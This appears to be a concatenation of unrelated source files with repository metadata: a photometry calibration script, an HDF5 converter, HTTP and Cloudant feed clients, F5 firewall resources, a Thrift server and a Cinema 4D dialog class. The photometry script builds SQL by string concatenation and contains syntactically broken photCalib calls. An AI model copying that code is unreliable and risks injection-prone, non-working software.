make_db = reduce(lambda x,y: x + ',' + y,[x + ' float(30)' for x in floatvars.keys()])
make_db += ',' + reduce(lambda x,y: x + ',' + y,[x + ' varchar(80)' for x in stringvars.keys()])
command = "CREATE TABLE IF NOT EXISTS photometry_db ( id MEDIUMINT NOT NULL AUTO_INCREMENT, PRIMARY KEY (id), " + make_db + ")"
print command
#c.execute(command)
# insert new observation
names = reduce(lambda x,y: x + ',' + y, [x for x in floatvars.keys()])
values = reduce(lambda x,y: str(x) + ',' + str(y), [floatvars[x] for x in floatvars.keys()])
names += ',' + reduce(lambda x,y: x + ',' + y, [x for x in stringvars.keys()])
values += ',' + reduce(lambda x,y: x + ',' + y, ["'" + str(stringvars[x]) + "'" for x in stringvars.keys()])
command = "INSERT INTO photometry_db (" + names + ") VALUES (" + values + ")"
print command
#c.execute(command)
f.write("%s %s %s\n" % (result[0][0], result[0][1], result[0][2]))
f.write("%s %s %s\n" % (result[1][0], result[1][1], result[1][2]))
f.write("%s#ReducedChiSq\n" % (result[2]))
f.write("%s#MeanError\n" % (result[3]))
f.write("%s\n" % (id))
else:
f.write("-1 -1 -1\n")
f.write("-1 -1 -1\n")
f.write("-1#ReducedChiSq\n")
f.write("-1#MeanError\n")
f.write("%s\n" % (id))
f.close
return id
def usage():
print "Usage:"
print "photo_abs.py -i input -f filter -n GABODSID - e ext. coeff. -c color coeff. -o output -l label"
print
print " -i, --input=STRING Input file, must have 4 columns: Instrumental Mag, Standard Mag, Color, Airmass"
print " -o, --output=STRING Output file basename"
print " -n, --night=INT GABODSID, unique numerical night identifier"
print " -e, --extinction=FLOAT Default value of extinction coefficient for one/two parameter fit"
print " -c, --color=FLOAT Default value of color term for one parameter fit"
print " -l, --label=STRING Label for color axis (e.g. B-V)"
print
print "Author:"
print " Joerg Dietrich <dietrich@astro.uni-bonn.de>"
print
return
if __name__ == "__main__":
__bonn_logger_id__ = BonnLogger.addCommand('maskBadOverscans.py',
sys.argv[1:])
try:
opts, args = getopt.getopt(sys.argv[1:],
"i:n:o:e:c:l:s:",
["input=", "night=", "extinction=",
"color=", "output=", "label=","sigmareject=","step=","cluster=","colorused="])
except getopt.GetoptError:
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print sys.argv[1:]
infile = night = extcoeff = colcoeff = outfile = label = sigmareject = step = cluster = colorused = None
for o, a in opts:
if o in ("-i", "--input"):
infile = a
elif o in ("-o", "--output"):
outfile = a
elif o in ("-n", "--night"):
night = int(a)
elif o in ("-e", "--extinction"):
extcoeff = float(a)
elif o in ("-c", "--color"):
colcoeff = float(a)
elif o in ("-l", "--label"):
label = a
elif o in ("-s", "--sigmareject"):
sigmareject = float(a)
elif o in ("-t", "--step"):
step = a
elif o in ("-c", "--cluster"):
cluster = a
elif o in ("-u", "--colorused"):
colorused = a
else:
print "option:", o
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print cluster
#raw_input()
if not infile or night==None or not outfile or \
extcoeff==None or colcoeff==None or label==None:
#print infile, night, outfile, coeff, color
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
data, airmass, color, magErr = readInput(infile)
#solutions = photCalib(data, airmass, color, magErr, [24, extcoeff, colcoeff], sigmareject)
solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'airmass':airmass, 'color':color}, 'guesses':{'airmasscoeff': airmasscoeff, 'colorcoeff':colorcoeff}, 'sigmareject':sigmareject, fit=[{'function':func_0(airmass,color)},{'function'['color']]})
solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'X':X,'Y':Y}, 'sigmareject':sigmareject, fit=[['A','B','C','D','E','F'],['color']]})
makePlots(data, airmass, color, outfile, solutions, label)
saveResults(outfile, solutions, step, sigmareject, cluster, colorused)
BonnLogger.updateStatus(__bonn_logger_id__, 0)
|
mit
| 5,730,884,299,488,931,000
| 37.771186
| 279
| 0.556175
| false
| 3.305039
| false
| false
| false
|
google/ffn
|
ffn/utils/png_to_h5.py
|
1
|
1099
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts PNG files from the working directory into a HDF5 volume.
Usage:
./png_to_h5.py output_filename.h5
"""
import glob
import sys
import h5py
import numpy as np
from scipy import misc
assert len(sys.argv) >= 2
png_files = glob.glob('*.png')
png_files.sort()
images = [misc.imread(i) for i in png_files]
images = np.array(images)
with h5py.File(sys.argv[1], 'w') as f:
f.create_dataset('raw', data=images, compression='gzip')
|
apache-2.0
| 2,254,648,750,721,236,200
| 29.527778
| 80
| 0.682439
| false
| 3.712838
| false
| false
| false
|
mit-ll/python-keylime
|
keylime/requests_client.py
|
1
|
1577
|
import requests
class RequestsClient:
def __init__(self, base_url, tls_enabled, **kwargs):
if tls_enabled:
self.base_url = f'https://{base_url}'
else:
self.base_url = f'http://{base_url}'
self.session = requests.Session()
for arg in kwargs:
if isinstance(kwargs[arg], dict):
kwargs[arg] = self.__deep_merge(
getattr(self.session, arg), kwargs[arg])
setattr(self.session, arg, kwargs[arg])
def request(self, method, url, **kwargs):
return self.session.request(method, self.base_url + url, **kwargs)
def head(self, url, **kwargs):
return self.session.head(self.base_url + url, **kwargs)
def get(self, url, **kwargs):
return self.session.get(self.base_url + url, **kwargs)
def post(self, url, **kwargs):
return self.session.post(self.base_url + url, **kwargs)
def put(self, url, **kwargs):
return self.session.put(self.base_url + url, **kwargs)
def patch(self, url, **kwargs):
return self.session.patch(self.base_url + url, **kwargs)
def delete(self, url, **kwargs):
return self.session.delete(self.base_url + url, **kwargs)
@staticmethod
def __deep_merge(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
RequestsClient.__deep_merge(value, node)
else:
destination[key] = value
return destination
|
bsd-2-clause
| -8,650,900,157,701,840,000
| 33.282609
| 74
| 0.577045
| false
| 3.846341
| false
| false
| false
|
evansde77/metson
|
src/cloudant/changes.py
|
1
|
2389
|
#!/usr/bin/env python
"""
_feeds_
Iterator support for consuming changes-like feeds
"""
import json
class Feed(object):
"""
_Feed_
Acts as an infinite iterator for consuming database feeds such as
_changes, suitable for feeding a daemon.
:params:
"""
def __init__(self, session, url, include_docs=False, **kwargs):
self._session = session
self._url = url
self._resp = None
self._line_iter = None
self._last_seq = kwargs.get('since')
self._continuous = kwargs.get('continuous', False)
self._end_of_iteration = False
self._params = {'feed': 'continuous'}
if include_docs:
self._params['include_docs'] = 'true'
def start(self):
"""
_start_
Using the provided session, start streaming
the feed continuously,
if a last seq value is present, pass that along.
"""
params = self._params
if self._last_seq is not None:
params['since'] = self._last_seq
self._resp = self._session.get(self._url, params=params, stream=True)
self._resp.raise_for_status()
self._line_iter = self._resp.iter_lines()
def __iter__(self):
"""
make this object an iterator
"""
return self
def __next__(self):
"""python3 compat"""
return self.next()
def next(self):
"""
_next_
Iterate: pull next line out of the stream,
attempt to convert the response to JSON, handling
case of empty lines.
If end of feed is seen, restart iterator
Returns JSON data representing what was seen in the feed.
"""
if self._end_of_iteration:
raise StopIteration
if not self._resp:
self.start()
line = self._line_iter.next()
if len(line.strip()) == 0:
return {}
try:
data = json.loads(line)
except ValueError:
data = {"error": "Bad JSON line", "line": line}
if data.get('last_seq'):
if self._continuous:
# forever mode => restart
self._last_seq = data['last_seq']
self.start()
return {}
else:
# not forever mode => break
return data
return data
|
apache-2.0
| -1,144,968,541,716,865,700
| 24.688172
| 77
| 0.529929
| false
| 4.351548
| false
| false
| false
|
F5Networks/f5-common-python
|
f5/bigip/tm/security/shared_objects.py
|
1
|
3549
|
# coding=utf-8
#
# Copyright 2015-2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""BIG-IP® Advanced Firewall Manager™ (AFM®) module.
REST URI
``http://localhost/mgmt/tm/security/shared-objects``
GUI Path
``Security --> Network Address Translation``
REST Kind
``tm:security:shared-objects:*``
"""
from distutils.version import LooseVersion
from f5.bigip.resource import Collection
from f5.bigip.resource import OrganizingCollection
from f5.bigip.resource import Resource
class Shared_Objects(OrganizingCollection):
"""BIG-IP® AFM® Nat organizing collection."""
def __init__(self, security):
super(Shared_Objects, self).__init__(security)
self._meta_data['minimum_version'] = '14.0.0'
self._meta_data['allowed_lazy_attributes'] = [
Address_Lists,
Port_Lists]
class Address_Lists(Collection):
"""BIG-IP® AFM® Address List collection"""
def __init__(self, shared_objects):
super(Address_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Address_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:address-list:address-liststate':
Address_List}
class Address_List(Resource):
"""BIG-IP® Address List resource"""
def __init__(self, address_lists):
super(Address_List, self).__init__(address_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:address-list:address-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self.tmos_ver = self._meta_data['bigip'].tmos_version
if LooseVersion(self.tmos_ver) < LooseVersion('12.0.0'):
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo'}
else:
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo', 'fqdns'}
class Port_Lists(Collection):
"""BIG-IP® AFM® Port List collection"""
def __init__(self, shared_objects):
super(Port_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Port_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:port-list:port-liststate':
Port_List}
class Port_List(Resource):
"""BIG-IP® Port List resource"""
def __init__(self, port_lists):
super(Port_List, self).__init__(port_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:port-list:port-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self._meta_data['minimum_additional_parameters'] = {'ports',
'portLists'}
|
apache-2.0
| -1,649,058,166,927,586,600
| 37.445652
| 78
| 0.642352
| false
| 3.836226
| false
| false
| false
|
serendio-labs-stage/diskoveror-ml-server
|
TopicThrift/server.py
|
1
|
1840
|
'''
Copyright 2015 Serendio Inc.
Author - Satish Palaniappan
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
'''
__author__ = "Satish Palaniappan"
### Insert Current Path
import os, sys, inspect
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + '/gen-py')
from categorizer import Categorizer
from categorizer.ttypes import *
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import socket
sys.path.append(cmd_folder + "/Model/")
import Categorize
class CategorizerHandler:
def __init__(self):
self.log = {}
self.catz = Categorize.Categorize()
def ping(self):
print ("Ping Success !! :)")
return
def getTopic(self, text):
cat = self.catz.getCategory(text)
print ("The Text : " + text + " ||| Topic: " + cat)
return cat
handler = CategorizerHandler()
processor = Categorizer.Processor(handler)
transport = TSocket.TServerSocket(port=8001)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print ("Python topics server running...")
server.serve()
|
apache-2.0
| -1,131,072,699,975,567,200
| 31.280702
| 168
| 0.755978
| false
| 3.687375
| false
| false
| false
|
corredD/upy
|
cinema4d/r20/c4dUI.py
|
1
|
40522
|
"""
Copyright (C) <2010> Autin L. TSRI
This file git_upy/cinema4d/r14/c4dUI.py is part of upy.
upy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
upy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with upy. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 18:17:17 2010
@author: -
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 13:45:52 2010
@author: -
"""
import sys,os
import c4d
from c4d import plugins
from c4d import utils
from c4d import bitmaps
from c4d import gui
import random
from upy.uiAdaptor import uiAdaptor
#UI general interface
class c4dUI(gui.GeDialog):
"""
The cinema4d uiAdaptor abstract class
====================================
This Adaptor give access to the basic cinema4d Draw function need for
create and display a gui.
"""
host = "c4d"
scale = 1
maxStrLenght=100
left, top, right, bottom =(25,1,1,1)
oid=1005
bid=1005
id = 1005
plugid = int(random.random()*10000000)
dock = False
w=100
h=100
tab=False
notebook = None
ystep = 0
scrolling = True
def addVariablePropToSc (self, *args):
#ghost function
pass
def CoreMessage(self, id, msg):
""" Hanlde the system event such as key or mouse position """
# print "coremessage"
# print "id",id
# print "msg",msg
return True
#-1008
#20000000073
def _setTitle(self,title):
self.SetTitle(title)
def createMenu(self,menuDic,menuOrder=None):
""" Define and draw the window/widget top file menu
@type menuDic: dictionary
@param menuDic: the menu elements, ie entry, callback and submenu
@type menuOrder: array
@param menuOrder: the menu keys oredered
"""
if menuOrder :
lookat = menuOrder
else :
lookat = menuDic.keys()
self.MenuFlushAll()
for mitem in lookat:
self.MenuSubBegin(mitem)
for elem in menuDic[mitem]:
if elem["sub"] is not None:
self.MenuSubBegin(elem["name"])
for sub in elem['sub']:
self.MenuAddString(elem['sub'][sub]["id"],
elem['sub'][sub]["name"])
self.MenuSubEnd()
else:
self.MenuAddString(elem["id"],elem["name"])
self.MenuSubEnd()
self.MenuFinished()
def handleMenuEvent(self,ev,menu):
""" This function handle the particular menu event, especially for
submenu level action
@type ev: int
@param ev: the current event
@type menu: dictionary
@param menu: the current menu
"""
#verify Enter?
print "menu",ev
if ev == 1056 :
return
for menuId in menu.keys():
for elem in menu[menuId]:
if elem["sub"] is not None:
for sub in elem['sub'].keys():
#print ev,elem['sub'][sub]["id"]
if ev == elem['sub'][sub]["id"] :
#print elem['sub'][sub]
if self._timer :
self.timeFunction(elem['sub'][sub]["action"],ev)
else :
self.callbackaction(elem['sub'][sub],ev)
else :
if ev==elem["id"] :
if self._timer :
self.timeFunction(elem["action"],ev)
else :
self.callbackaction(elem,ev)
def addVariable(self,type,value):
""" Create a container for storing a widget states """
return value
def drawObj(self,elem,x,y,w=None,h=None):
""" Draw an object input where you can drag on object
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
#elem["id"] = gui.LinkBoxGui()
def getFlagAlignement(self,options):
alignement = {"hleft_scale":c4d.BFH_LEFT|c4d.BFH_SCALE| c4d.BFV_MASK,
"hcenter_scale":c4d.BFH_CENTER|c4d.BFH_SCALE| c4d.BFV_MASK,
"hleft":c4d.BFH_LEFT| c4d.BFV_MASK,
"hfit":c4d.BFH_FIT| c4d.BFV_MASK,
"hfit_scale":c4d.BFH_SCALEFIT| c4d.BFV_MASK,
"hcenter":c4d.BFH_CENTER| c4d.BFV_MASK,
}
if type(options) is int :
return options
elif options not in alignement :
print options
return c4d.BFH_SCALEFIT|c4d.BFV_MASK
return alignement[options]
def drawButton(self,elem,x,y,w=None,h=None):
""" Draw a Button
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddButton(id=elem["id"], flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
name=name)
def drawCheckBox(self,elem,x,y,w=None,h=None):
""" Draw a checkBox
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddCheckbox(id=elem["id"],flags=elem["alignement"],#BFH_SCALEFIT,
name=name,
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"] is not None :
self.SetBool(elem["id"],elem["value"])
def resetPMenu(self,elem):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
"""
elem["value"]=[]
self.FreeChildren(elem["id"])
def addItemToPMenu(self,elem,item):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type item: string
@param item: the new entry
"""
self.AddChild(elem["id"],len(elem["value"]),item)
elem["value"].append(item)
self.SetLong(elem["id"],len(elem["value"])-1)
def drawPMenu(self,elem,x,y,w=None,h=None):
""" Draw a pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_LEFT|c4d.BFH_SCALEFIT
self.AddComboBox(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale)
# inith=elem["height"]*self.scale)
[self.AddChild(elem["id"],x[0],x[1]) for x in enumerate(elem["value"])]
def drawLine(self,elem,x,y,w=None,h=None):
""" Draw a Separative Line
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["value"] == "H":
self.AddSeparatorH(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
elif elem["value"] == "V":
self.AddSeparatorV(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
def drawLabel(self,label,x,y,w=None,h=None):
""" Draw a Label
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if label["alignement"] is None :
label["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddStaticText(label["id"],flags=label["alignement"])#BFH_SCALEFIT)#|c4d.BFV_SCALEFIT)#c4d.BFH_LEFT)c4d.BFH_LEFT|
self.SetString(label["id"],label["label"])
def drawStringArea(self,elem,x,y,w=None,h=None):
""" Draw a String Area input elem, ie multiline
@type elem: dictionary
@param elem: the string area input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddMultiLineEditText(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
style=c4d.DR_MULTILINE_SYNTAXCOLOR)
self.SetString(elem["id"],elem["value"])
def drawString(self,elem,x,y,w=None,h=None):
""" Draw a String input elem
@type elem: dictionary
@param elem: the string input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditText(id=elem["id"],
flags=elem["alignement"],#| c4d.BFV_MASK,#BFH_CENTER
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetString(elem["id"],elem["value"])
def drawSliders(self,elem,x,y,w=None,h=None):
""" Draw a Slider elem, the variable/value of the elem define the slider format
@type elem: dictionary
@param elem: the slider input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditSlider(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["variable"] is None :
elem["variable"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
if elem["step"] is None :
elem["step"] =0.0
self.SetReal(elem["id"],float(elem["variable"]),float(elem["mini"]),
float(elem["maxi"]), float(elem["step"]))
def drawNumbers(self,elem,x,y,w=None,h=None):
""" Draw a Int input elem
@type elem: dictionary
@param elem: the Int input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetLong(elem["id"],int(elem["value"]),int(elem["mini"]),
int(elem["maxi"]))
def drawFloat(self,elem,x,y,w=None,h=None):
""" Draw a float input elem
@type elem: dictionary
@param elem: the Int input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
if elem["value"] is None :
elem["value"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
#print float(elem["value"]),float(elem["mini"]),float(elem["maxi"])
self.SetReal(elem["id"],float(elem["value"]),float(elem["mini"]),
float(elem["maxi"]))
def drawImage(self,elem,x,y,w=None,h=None):
""" Draw an Image, if the host supported it
@type elem: dictionary
@param elem: the image input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
# bmp = c4d.bitmaps.BaseBitmap()
# bmp.InitWith(elem["value"])
# bc = c4d.BaseContainer()
# need to use userarea
# area = c4d.gui.GeUserArea()
# self.AddUserArea(5000,flags=c4d.BFH_SCALEFIT,initw=100, inith=150)
# self.AttachUserArea(area, id=10, userareaflags=c4d.USERAREA_COREMESSAGE)
# self.area.DrawBitmap(bmp, 0, 0, 396, 60, 0, 0, 396, 60, mode=c4d.BMP_NORMALSCALED)#396x60
## self.area.DrawText('welcome to ePMV '+__version__, 0, 0, flags=c4d.DRAWTEXT_STD_ALIGN)
# self.area.Init()
# self.area.InitValues()
def drawColorField(self,elem,x,y,w=None,h=None):
""" Draw a Color entry Field
@type elem: dictionary
@param elem: the color input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = elem["alignement"]
# print elem
self.AddColorField(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"]is not None:
# print "v",elem["value"]
self.setColor(elem,elem["value"])
# print "n",elem["name"]
def drawError(self,errormsg=""):
""" Draw a error message dialog
@type errormsg: string
@param errormsg: the messag to display
"""
c4d.gui.MessageDialog("ERROR: "+errormsg)
def drawQuestion(self,title="",question="",callback=None):
""" Draw a Question message dialog, requiring a Yes/No answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: bool
@return: the answer
"""
res = c4d.gui.QuestionDialog(question)
if callback is not None :
callback(res)
else :
return res
def drawMessage(self,title="",message=""):
""" Draw a message dialog
@type title: string
@param title: the windows title
@type message: string
@param message: the message to display
"""
c4d.gui.MessageDialog(message)
def drawInputQuestion(self,title="",question="",callback=None):
""" Draw an Input Question message dialog, requiring a string answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: string
@return: the answer
"""
result = c4d.gui.InputDialog(question,"")
if result :
if callback is not None :
callback(result)
else :
return result
def drawFrame(self,bloc,x,y):
"""
Function to draw a block as a collapsable frame layout of the gui.
@type block: array or dictionary
@param block: list or dictionary of item dictionary
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
grFlag = c4d.BFH_SCALEFIT# |c4d.BFV_MASK
if bloc["scrolling"]:
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
else :
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
if bloc["collapse"] :
collapse = c4d.BFV_BORDERGROUP_FOLD#|c4d.BFV_GRIDGROUP_EQUALCOLS
else :
collapse = c4d.BFV_BORDERGROUP_FOLD|c4d.BFV_BORDERGROUP_FOLD_OPEN
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#rows=len(bloc["elems"]),
flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
groupflags=collapse)
self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_MASK)#|c4d.BORDER_MASK
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
for k,blck in enumerate(bloc["elems"]):
self.startBlock(m=len(blck))
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
self.endBlock()
self.endBlock()
#if bloc["scrolling"]:
# self.endBlock()#scroll
# self.endBlock()#main
return y
def drawTab(self,bloc,x,y):
"""
Function to draw a block as a collapsable frame layout of the gui.
@type block: array or dictionary
@param block: list or dictionary of item dictionary
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
#TODO the Group system is confusin and nee to be improved inuPy
#can we change color?
if not self.tab :
self.notebook = self.TabGroupBegin(id=bloc["id"]*1000,#title=bloc["name"],cols=1,
flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
tabtype=c4d.TAB_TABS)
self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)#c4d.BORDER_BLACK|BORDER_WITH_TITLE
self.tab = True
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
if bloc["scrolling"]:
self.ScrollGroupBegin(id=bloc["id"]*5, flags=c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT,
scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
# self.GroupBorderNoTitle(c4d.BORDER_NONE|c4d.BORDER_WITH_TITLE)
#should use max number of column?
#get max nb elem:
max = 0
for k,blck in enumerate(bloc["elems"]):
if len(blck) > max :
maxi = len(blck)
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
# if bloc["scrolling"]:
# self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_WITH_TITLE_BOLD| c4d.BORDER_MASK)
# else :
# self.GroupBorderNoTitle(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)
# if self.scrolling:
# self.ScrollGroupBegin(id=bloc["id"]*5000, flags=c4d.BFH_CENTER | c4d.BFV_MASK,#initw=self.w,inith=self.h,
